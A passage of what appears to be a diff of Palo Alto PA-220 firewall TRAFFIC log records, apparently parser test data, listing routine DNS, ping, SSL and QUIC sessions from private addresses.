16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 